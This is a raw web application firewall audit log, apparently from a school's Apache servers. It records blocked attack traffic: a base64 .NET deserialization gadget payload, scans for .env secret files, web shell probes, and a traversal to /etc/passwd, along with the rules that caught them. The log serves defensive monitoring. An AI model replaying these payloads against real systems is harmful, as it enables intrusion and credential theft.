c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1
bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5
DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZl
cnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAA
AAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} --7bbc6d6c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bbc6d6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747927414173823 5876 (- - -) Stopwatch2: 1747927414173823 5876; combined=3809, p1=648, p2=2997, p3=34, p4=37, p5=92, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bbc6d6c-Z-- --17801f03-A-- [22/May/2025:23:47:06 +0700] aC9VCuThJmFSRJ5-OZfodwAAAEQ 103.236.140.4 59116 103.236.140.4 8181 --17801f03-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) Accept-Charset: utf-8 --17801f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17801f03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747932426758288 695 (- - -) Stopwatch2: 1747932426758288 695; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17801f03-Z-- --6cd32a09-A-- [22/May/2025:23:47:25 +0700] aC9VHWfriXjg62qQwE9snwAAAJE 103.236.140.4 59152 103.236.140.4 8181 --6cd32a09-B-- GET /images/stories/radio.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Team Anon Force Accept: */* --6cd32a09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cd32a09-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932445191603 2019 (- - -) Stopwatch2: 1747932445191603 2019; combined=935, p1=326, p2=581, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cd32a09-Z-- --3d31e422-A-- [22/May/2025:23:47:34 +0700] aC9VJuThJmFSRJ5-OZfoigAAAFM 103.236.140.4 59168 103.236.140.4 8181 --3d31e422-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --3d31e422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d31e422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747932454562071 671 (- - -) Stopwatch2: 1747932454562071 671; combined=274, p1=244, p2=0, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d31e422-Z-- --5b61df70-A-- [22/May/2025:23:50:25 +0700] aC9V0eThJmFSRJ5-OZfo7AAAAEA 103.236.140.4 59416 103.236.140.4 8181 --5b61df70-B-- GET /images/stories/wso.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Team Anon Force Accept: */* --5b61df70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b61df70-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932625234670 14639 (- - -) Stopwatch2: 1747932625234670 14639; combined=26384, p1=308, p2=544, p3=0, p4=0, p5=12812, sr=65, sw=0, l=0, gc=12720 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b61df70-Z-- --840dbb77-A-- [22/May/2025:23:53:10 +0700] aC9WduThJmFSRJ5-OZfpSQAAAFA 103.236.140.4 59672 103.236.140.4 8181 --840dbb77-B-- GET /images/stories/spy.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Team Anon Force Accept: */* --840dbb77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --840dbb77-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932790557278 1842 (- - -) Stopwatch2: 1747932790557278 1842; combined=891, p1=308, p2=556, p3=0, p4=0, p5=27, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --840dbb77-Z-- --4195393d-A-- [22/May/2025:23:55:40 +0700] aC9XDOThJmFSRJ5-OZfpkQAAAEU 103.236.140.4 59848 103.236.140.4 8181 --4195393d-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 163523548 --4195393d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4195393d-E-- --4195393d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932940904948 2110 (- - -) Stopwatch2: 1747932940904948 2110; combined=602, p1=418, p2=154, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4195393d-Z-- --745a284e-A-- [23/May/2025:00:00:26 +0700] aC9YKuThJmFSRJ5-OZfpogAAAFc 103.236.140.4 59912 103.236.140.4 8181 --745a284e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --745a284e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --745a284e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747933226613213 906 (- - -) Stopwatch2: 1747933226613213 906; combined=330, p1=284, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
